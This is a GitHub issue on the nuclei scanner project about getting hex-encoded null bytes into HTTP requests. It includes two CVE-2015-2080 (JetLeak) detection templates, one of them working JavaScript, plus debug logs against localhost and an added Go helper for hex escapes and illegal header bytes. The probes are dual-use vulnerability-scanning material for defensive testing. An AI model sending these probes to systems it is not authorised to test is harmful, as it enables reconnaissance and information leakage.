projectdiscovery / nuclei

Fast and customizable vulnerability scanner based on simple YAML based DSL.
https://docs.projectdiscovery.io/tools/nuclei
MIT License

Interpret hex encoded strings when parsing http requests #5268

Open tarunKoyalwar opened 3 months ago

tarunKoyalwar commented 3 months ago

Nuclei version:

main | latest

Current Behavior:

The template https://cloud.projectdiscovery.io/public/CVE-2015-2080 is not working because the null byte in hex-encoded format \x00 is being treated as a string instead of an actual null byte; this seems to be happening with both simple HTTP and raw HTTP requests. While one way to fix this is to write the template in JavaScript, it introduces another set of challenges, i.e. we should add a utility to interpret hex-encoded data in strings.

Expected Behavior:

working template

Steps To Reproduce:

Anything else:

tarunKoyalwar commented 3 months ago

Looks like we can already achieve this using the DSL helper function, but for some reason this doesn't work:

id: CVE-2015-2080

info:
  name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage
  author: pikpikcu
  severity: high
  description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
  remediation: |
    Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability.
  reference:
    - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
    - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
    - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2080
    - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-2080
    cwe-id: CWE-200
    epss-score: 0.95465
    epss-percentile: 0.99329
    cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fedoraproject
    product: fedora
  tags: cve2015,cve,jetty,packetstorm,fedoraproject

http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Referer: {{hex_decode("00")}}
        Connection: close

    matchers-condition: and
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Illegal character 0x0 in state"

      - type: status
        status:
          - 400

nuclei -t a.yaml -u http://localhost:8080 -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.8

        projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.2.8 (latest)
[INF] Current nuclei-templates version: v9.8.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 62
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2015-2080] Dumped HTTP request for http://localhost:8080/

POST / HTTP/1.1
Host: localhost:8080
Referer: 
Connection: close

[VER] [CVE-2015-2080] Sent HTTP request to http://localhost:8080/
[DBG] [CVE-2015-2080] Dumped HTTP response http://localhost:8080/

HTTP/1.1 400 Illegal character 0x0
Connection: close
Server: Jetty(9.2.30.v20200428)
Content-Length: 0

[INF] No results found. Better luck next time!

But this works:

id: CVE-2015-2080

info:
  name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage
  author: pikpikcu
  severity: high
  description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
  remediation: |
    Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability.
  reference:
    - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
    - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
    - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2080
    - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-2080
    cwe-id: CWE-200
    epss-score: 0.95465
    epss-percentile: 0.99329
    cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fedoraproject
    product: fedora
  tags: cve2015,cve,jetty,packetstorm,fedoraproject

javascript:
  - code: |
      let m = require('nuclei/net');
      let address=Host+':'+Port;
      let conn = m.Open('tcp', address);
      conn.Send('GET / HTTP/1.1\r\nHost: '+address+'\r\n');
      conn.Send('Referer: ');
      conn.SendHex('00'); // null byte
      conn.Send('\r\nConnection: close\r\n\r\n');
      resp = conn.RecvString();

    args:
      Host: "{{Host}}"
      Port: '8080' # hardcoded port

    matchers-condition: and
    matchers:
      - type: dsl
        dsl: 
          - 'contains(response, "Illegal character 0x0 in state")'
          - 'contains(response, "HTTP/1.1 400")'

    extractors:
      - type: dsl
        dsl:
          - response

nuclei -t b.yaml -u http://localhost:8080 -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.8

        projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.2.8 (latest)
[INF] Current nuclei-templates version: v9.8.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 62
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2015-2080] Sent Javascript request to localhost:8080
[DBG] [CVE-2015-2080] Dumped Javascript request for localhost:8080:
Variables:
    1. Host => localhost
    2. Port => 8080 address=localhost:8080
[DBG]  [CVE-2015-2080] Javascript Code:

    let m = require('nuclei/net');
    let address = Host + ':' + Port;
    let conn = m.Open('tcp', address);
    conn.Send('GET / HTTP/1.1\r\nHost: ' + address + '\r\n');
    conn.Send('Referer: ');
    conn.SendHex('00'); // null byte
    conn.Send('\r\nConnection: close\r\n\r\n');
    resp = conn.RecvString();

[DBG] [CVE-2015-2080] Dumped Javascript response for localhost:8080:
    1. response => HTTP/1.1 400 Illegal char .... tty(9.2.30.v20200428)    
    2. success => true address=localhost:8080
[CVE-2015-2080:dsl-1] [javascript] [high] localhost:8080 ["HTTP/1.1 400 Illegal character 0x0\r\nContent-Length: 0\r\nConnection: close\r\nServer: Jetty(9.2.30.v20200428)"]

cc: @ehsandeep
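As an added example (not code from the issue or from nuclei itself), a Go sketch of the utility the issue asks for: it interprets `\xHH` escapes in a raw request so the NUL reaches the wire as a real 0x00 byte, and pairs it with the header check a server-side parser performs when it rejects such bytes, which is what Jetty does with the 400 in the dump above. The `rawRequest` sample is constructed from the issue's request; the function names are hypothetical.

```go
package main

import (
	"encoding/hex"
	"fmt"
)

// Constructed sample: the issue's raw request with the NUL written as \x00.
const rawRequest = "POST / HTTP/1.1\r\nHost: localhost:8080\r\n" +
	"Referer: \\x00\r\nConnection: close\r\n\r\n"

// InterpretHexEscapes turns each \xHH into the byte 0xHH so a NUL survives as
// a real 0x00, not the text "\x00". "\\x" stays literal; malformed \x is kept.
func InterpretHexEscapes(s string) []byte {
	out := make([]byte, 0, len(s))
	for i := 0; i < len(s); i++ {
		if s[i] == '\\' && i+2 < len(s) && s[i+1] == '\\' && s[i+2] == 'x' {
			out = append(out, '\\', 'x') // escaped backslash: keep literal \x
			i += 2
			continue
		}
		if s[i] == '\\' && i+3 < len(s) && s[i+1] == 'x' {
			if b, err := hex.DecodeString(s[i+2 : i+4]); err == nil {
				out = append(out, b[0])
				i += 3
				continue
			}
		}
		out = append(out, s[i]) // ordinary byte, lone backslash or malformed escape
	}
	return out
}

// IllegalHeaderBytes returns offsets of control bytes other than CR, LF and
// TAB, the condition Jetty answers with "400 Illegal character 0x0" above.
func IllegalHeaderBytes(req []byte) []int {
	var offs []int
	for i, b := range req {
		if (b < 0x20 && b != '\r' && b != '\n' && b != '\t') || b == 0x7f {
			offs = append(offs, i)
		}
	}
	return offs
}

func main() {
	req := InterpretHexEscapes(rawRequest)
	fmt.Printf("%q\nillegal header bytes at %v\n", req, IllegalHeaderBytes(req))
}
```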